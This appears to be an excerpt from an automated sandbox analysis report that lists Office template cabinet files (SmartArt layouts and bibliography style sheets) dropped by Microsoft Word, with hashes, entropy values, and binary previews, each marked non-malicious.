                                                  Preview:MSCF....2.......D...........................2....?..................0...............ThemePictureAccent.glox.....0...........Content.inf.o.@D..8.[.........B.....?. $...K.....~....aZ.WA"...k.......Z......."......"..X.fpB 2@d..87.[.A......p..e.'......F..P^%.%.RK...........T%0..........9..+8 ...&.q.....+.......^.fad^^n...d.....s1..... .3j.c-c7..y<.....6........C5n.KG...Rs[lt..ZkwI.!..Uj.ez_!A^: /.;.Rl4....^..<6..N...'.YY.n*.E{.`..s.7..z.......L.y.Y.....q.kx.....[5.+<to......1...L.r.m..kC.q.k.1..o.w8s.....xh.@.b.`l\...}z1.6..Y.</DY...Z5..D...0..4.;..XAA..0qD..E.....h...C..hH......S..Z.\.VBu......Rxs.+:RKzD......{......a..=......).<.....d.SM.......c!t.4.h..A=J~.>q?Hw.^.....?.....[..`....v.nl..A.u...S!...............c......b.J.I.....D...._?}..or.g.JZ#*."_``.>.....{...w......s...R.iXR..'z....S.z.\..f.....>7m..0q.c-8\..nZw.q..J.l....+..V....ZTs{.[yh..~..c........9;..D...V.s...#...JX~t8%......cP^...!.t......?..'.(.kT.T.y.I ...:..Y3..[Up.m...%.~
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):21791
                                                  Entropy (8bit):7.65837691872985
                                                  Encrypted:false
                                                  SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                  MD5:7BF88B3CA20EB71ED453A3361908E010
                                                  SHA1:F75F86557051160507397F653D7768836E3B5655
                                                  SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                  SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                  Malicious:false
                                                  Preview:MSCF............D................................?..................................RadialPictureList.glox.................Content.inf....8....[.... $nq......C...../U..........a......S.Q...Q....j............(..z,.g.........^...Y..D... #i.TH5.<.=N..$..7.p".7.............`.3..1~,=,(.d8.Z.1....4'G.....!W^gClf._j.-N..&k.....Y3` =.(S..B^...i.zB.U....0O..h...I.(.......L...5.X.8.Sc<=>w.=.?&.....mR.......x.......mpW.T..^.FU...SN.C)......vsa.,x......,....E..i>..[g...#t...M..GR.9..$/4.:..q.bc9..x{bC.0..K.)..t.Y.&.v.d.16.B..c..or..W.,.B.........O.0..k.v........*F+..U.w...d...o8......A).}...#......L.!?.U.r.^.$...e.(..PG)8..+.9.5.l}.)..b.7+. 4....-.lC...|..j..Q.,.....7.W...|;j...%...:...|H..........<..%...K.....Fy.q$.k..}..8.9.M.u.?$].......r.....e.|..._..iT.;Dq5[....f.s..P.......e.T....!Y{.....t.wm..A..w-..7...3..T.:8.4.a[.Oo.. V.l.@.}..........E.&..J.....+..+.9)9<.._R.Hb.....V..Qu....:v.t.Li.0..J..V..b...!..N....-mD..c..(.[&o>.M.b..H.q..lk../..........W.8..z..B...
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):23597
                                                  Entropy (8bit):7.692965575678876
                                                  Encrypted:false
                                                  SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                  MD5:7C645EC505982FE529D0E5035B378FFC
                                                  SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                  SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                  SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                  Malicious:false
                                                  Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):31562
                                                  Entropy (8bit):7.81640835713744
                                                  Encrypted:false
                                                  SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                  MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                  SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                  SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                  SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                  Malicious:false
                                                  Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):32833
                                                  Entropy (8bit):7.825460303519308
                                                  Encrypted:false
                                                  SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                  MD5:205AF51604EF96EF1E8E60212541F742
                                                  SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                  SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                  SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                  Malicious:false
                                                  Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):31605
                                                  Entropy (8bit):7.820497014278096
                                                  Encrypted:false
                                                  SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                  MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                  SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                  SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                  SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                  Malicious:false
                                                  Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):30957
                                                  Entropy (8bit):7.808231503692675
                                                  Encrypted:false
                                                  SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                  MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                  SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                  SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                  SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                  Malicious:false
                                                  Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):31083
                                                  Entropy (8bit):7.814202819173796
                                                  Encrypted:false
                                                  SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                                  MD5:89A9818E6658D73A73B642522FF8701F
                                                  SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                  SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                  SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                  Malicious:false
                                                  Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):31471
                                                  Entropy (8bit):7.818389271364328
                                                  Encrypted:false
                                                  SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                  MD5:91AADBEC4171CFA8292B618492F5EF34
                                                  SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                  SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                  SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                  Malicious:false
                                                  Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):19288
                                                  Entropy (8bit):7.570850633867256
                                                  Encrypted:false
                                                  SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                  MD5:B9A6FF715719EE9DE16421AB983CA745
                                                  SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                  SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                  SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                  Malicious:false
                                                  Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 5213 bytes, 2 files, at 0x44 "rings.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):21357
                                                  Entropy (8bit):7.641082043198371
                                                  Encrypted:false
                                                  SSDEEP:384:zdx+NRrogu6fzCI7Th7G8E0GftpBjEzZq4FLrHRN7/Oll7PK/pB:/+NRrFf/G8Pi6zZb/GIB
                                                  MD5:97F5B7B7E9E1281999468A5C42CB12E7
                                                  SHA1:99481B2FA609D1D80A9016ADAA3D37E7707A2ED1
                                                  SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                  SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                  Malicious:false
                                                  Preview:MSCF....].......D...........................]....?..........{.......................rings.glox.................Content.inf..|^.....[......P........<.$.."..0R..xa.Ax#B..d... ....K,.....^.H.....H.........&.j.\f.. ..,....,..!k..R..e..!...E...........................><.RB.....~h...........Q................g..M|,...x.....qV7.u..\...F-N.{-..X..&Zig.~..{.A.p.Z...X..{,-n............`$.%.ND.....>].6cvZ.%d..*a.$..-.K.Hf....L..;.#...H....U,........P.@.*-$C.,.g...%YJE..$.jP........b...Y<..[U...MF]F.K...1... x.}3w.o.#,.}T.....w5+...=.=...c.F^....OM.=.......G_{n.*...WC.w!......{/.~.}..s..6_......)..Xy...4.....<..XZJ........#~._i....%..fM.V.?.q...q.....7...B..sVt...(.:..c....~.e...kGZ...C..(J..o...`...?.)-.T.l....&...gR.$.....g.:...2.e%F.....x....z0...K..a8B...........D..]....7....~.".DR...r)...}b)e.>.\h~f...(}.c........Q...o5H.........C.KC.(.L.l................R..a.pg{..\.......-b........}.C......qTS..%..r.lG..Q.1..Z.>a.D...tC..LV...Rs.C.M18x.:......%O.
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):22340
                                                  Entropy (8bit):7.668619892503165
                                                  Encrypted:false
                                                  SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                  MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                  SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                  SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                  SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                  Malicious:false
                                                  Preview:MSCF....4.......D...........................4....?..................1...............ThemePictureGrid.glox.....1...........Content.inf....K..5.[.... V.q......B.....?.h.i.J.D...Z...>.....i~...A...Z....H.hy.D..X.....>...L.I..`. z w0}.K`.C{h....W\../.U..p\%...B...;............9..8.^M.....].lP.p...|..?..M....E..S.`..-n........Q'.'.o..C}=..?`.bQ...J"0f.. ....k3n..F.Pu..#...w].`<...."D.].-.#+):..fe..=<.M...4..s.q.f._.=.*T.M..U.[R.kbw.,......t6_I...~.X..$_.q....}2..BR...).[...<.l.3........h%....2.$`>..hG...0.6.S......._3.d~1.c.2g....7tTO..F.D.f.Y..WCG.B..T....Gg&.U'....u.S/......&6w..[bc.4....R.e..f.,....l."........I....J.=~...$x.&2...+,-.;.v.'.AQ.fc...v._..rZ..TYR...g?..Z..!.3mP dj...../...+...q.....>..../...]P.z?DW&.p..GZ....R5n......,..]{].0m.9...o.{...e."...8VH....w"%;.g\.K..p.}....#r.u..l.vS...Y.7U.N*-E@.....~....E...x.....C.......{NP....5Ymk.*._.K...Z...f..;.......b.....,._@B..\.S..d.'\rs..].}.5"XJU.J..'.zk}.+P.)C.X.?9sx.D....(K....P^N_D...Z.........
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 3749 bytes, 2 files, at 0x44 "TabbedArc.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):19893
                                                  Entropy (8bit):7.592090622603185
                                                  Encrypted:false
                                                  SSDEEP:384:v3Zh3VlkpSIcgbA8E0GftpBjEmm3UFLrHRN7GYvlvQyUTL2mTAp:v31qp/A8Pi6mUqGGvU+mcp
                                                  MD5:EF9CB8BDFBC08F03BEF519AD66BA642F
                                                  SHA1:D98C275E9402462BF52A4D28FAF57DF0D232AF6B
                                                  SHA-256:93A2F873ACF5BEAD4BC0D1CC17B5E89A928D63619F70A1918B29E5230ABEAD8E
                                                  SHA-512:4DFBDF389730370FA142DCFB6F7E1AC1C0540B5320FA55F94164C0693DB06C21E6D4A1316F0ABE51E51BCBDAB3FD33AE882D9E3CFDB4385AB4C3AF4C2536B0B3
                                                  Malicious:false
                                                  Preview:MSCF............D................................?..................c...............TabbedArc.glox.....c...........Content.inf.;....Y.[.........B.....?.T..ZD...........^C...U.R<Z....z+.I.....Z..-.V...f.....lB..\P.....=.-p....w ...\.kD..x'v..T..A..............".8...d.........FD.ZL.h..T...bp.)9B.v..i..VX...&..\..7.s..qy...l........Rty.Y...rU..>.9...8....L..\.^x.kDU.|TJ..{kN.G..E..$.kvy?.. mv......P..4.....q.1.6<u....e..dD...4.1E..Xi.5.=....1.P.c.K~S...YMO:.?..cL.g.tq\.(b1....E..0A.i..C...BT.m.S......:...}.&U..#QL..O.O../..K......=..........0a..O............BYP......>f.......iu...7.K..;QO~.t....%N.s.]>~#../7YN.....C..9.=cY.......y..U5.....,.....u.....#_..SG.`NR*.....?*..d.R.k.rX$...&.... ..h.4T.D^k-xA...............Hz..ep)e..4..P."fo Ne...o.....0n.Exr.........H..v...A.."..%)2......5...".}j.o8...E.HRQ;}.. .._L.+.jz....{.U..}...=B.o.^..vZ.:5.Z.M....y{\(...N..9...EB*MG...!N.vy..^...nE..2..@.;.4..C..t.4....h..O.8.=.m./...|Lu.|mCU..b.^.n39.h[M...%D{..w.1
                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                  File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                  Category:dropped
                                                  Size (bytes):21875
                                                  Entropy (8bit):7.6559132103953305
                                                  Encrypted:false
                                                  SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                  MD5:E532038762503FFA1371DF03FA2E222D
                                                  SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                  SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                  SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                  Malicious:false
                                                  Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
